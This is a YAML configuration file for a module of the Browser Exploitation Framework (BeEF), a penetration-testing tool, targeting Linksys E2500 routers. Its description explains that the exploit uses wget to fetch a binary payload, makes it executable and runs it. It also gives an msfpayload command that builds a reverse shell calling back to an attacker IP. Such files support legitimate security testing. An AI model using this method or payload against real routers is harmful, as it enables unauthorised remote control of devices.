16 lines
754 B
YAML
16 lines
754 B
YAML
#
|
|
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - https://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
beef:
|
|
module:
|
|
linksys_e2500_shell:
|
|
enable: true
|
|
category: ["Exploits", "Router"]
|
|
name: "Linksys E2500 Shell"
|
|
description: "Attempts to exploit a command execution vulnerability on a Linksys E2500 router. <br> It will wget a binary payload to the temp directory, change permissions, and run the binary.<br>Command to generate payload: <b>msfpayload linux/mipsle/shell_reverse_tcp LHOST=[Attacker IP] X > reverse</b>"
|
|
authors: ["Esteban Rodriguez"]
|
|
target:
|
|
working: ["ALL"]
|